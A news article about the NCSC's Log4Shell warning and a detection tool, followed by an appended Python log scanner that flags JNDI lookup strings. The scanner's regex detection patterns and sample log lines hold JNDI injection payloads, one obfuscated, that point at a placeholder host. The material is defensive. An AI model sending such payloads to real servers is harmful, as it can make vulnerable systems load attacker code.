
NCSC warns of highly critical vulnerability in Apache Log4j software



The National Cyber Security Center (NCSC) warns of a highly critical vulnerability in the Apache Log4j software used by web servers. The vulnerability makes it possible to penetrate networks and carry out ransomware attacks. A patch is now available.

The vulnerability found in the Apache Log4j software (CVE-2021-44228), which has since become known as Log4Shell, makes it possible to compromise the permissions of web servers. The affected software is used, among other things, to record which usernames log on to websites and when.

Hacking method

The vulnerability arises because the JNDI features used in configuration settings, log messages and parameters do not protect against hacker-controlled LDAP servers and other JNDI-related endpoints. When the so-called message lookup is turned on, this makes it easy for hackers to remotely control what ends up in these log messages or parameters and then have the server load code from an LDAP server they control.

Ransomware easy to spread

This makes it easy for hackers to spread ransomware and attack networks. According to experts, it is very likely that hackers are already present in company networks via this method, and a wave of ransomware attacks can be expected.

The Dutch cyber watchdog urges companies to be very alert to the vulnerability. The NCSC has established that the method is already being actively used in the Netherlands. Companies are urged to install the Apache patches as soon as possible.

Detection tool

Cybersecurity specialist Northwave has now developed a detection tool that allows companies to discover whether their systems are affected by the Apache Log4j vulnerability. The tool checks for vulnerable systems by injecting a payload into the User-Agent header of an HTTP GET request and then watching for incoming DNS requests carrying a specially generated UUID. Watching inbound DNS traffic, rather than deploying an LDAP server, is more likely to reveal vulnerable systems that have outbound filtering turned on, because outgoing DNS traffic is often still allowed in practice.

The Northwave specialists do issue an important disclaimer with the tool: it only checks the User-Agent header of HTTP GET requests. This may cause false positives in cases where other headers, or input fields, need to be targeted as part of an HTTP GET request. In these cases, the security experts recommend performing additional checks.
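A complementary, purely passive check for the lookup mechanism described under "Hacking method" and the header-scoped limitation noted above: scanning existing web server access logs for JNDI lookup strings in any logged field, not just User-Agent. This is an added example written for this article, not Northwave's tool or Apache code; the log lines, host names and regular expressions are constructed assumptions, and it only flags attempted lookups, not whether they succeeded.

```python
import re
from urllib.parse import unquote

# Log4j resolves nested ${...} lookups, so probes often hide the "jndi" token
# (e.g. ${${lower:j}ndi:...} or ${::-j}ndi). We collapse the simplest nested
# forms and URL-encoding before matching, so the plain pattern still fires.
_INNER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)   # ${lower:j} -> j
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                        # ${x:-j}    -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
                   re.IGNORECASE)

# Constructed sample access-log lines (Combined Log Format); line 1 is benign.
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def normalise(s: str) -> str:
    """URL-decode and collapse trivial nested lookups until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = unquote(s)
        s = _INNER.sub(lambda m: m.group(1), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def find_jndi(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) found in the line, else None.

    The whole line is inspected, so a lookup in the request path or any other
    logged field is caught, not only one in the User-Agent header.
    """
    m = _JNDI.search(normalise(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, scheme) for every line carrying a JNDI lookup."""
    return [(i, s) for i, l in enumerate(lines, 1) if (s := find_jndi(l))]


if __name__ == "__main__":
    for number, scheme in scan(LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Hits from such a scan are leads for incident response (which sources, which paths, what the server did next), not proof of compromise; the DNS-callback approach described above remains the way to confirm a system actually performs the lookup.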
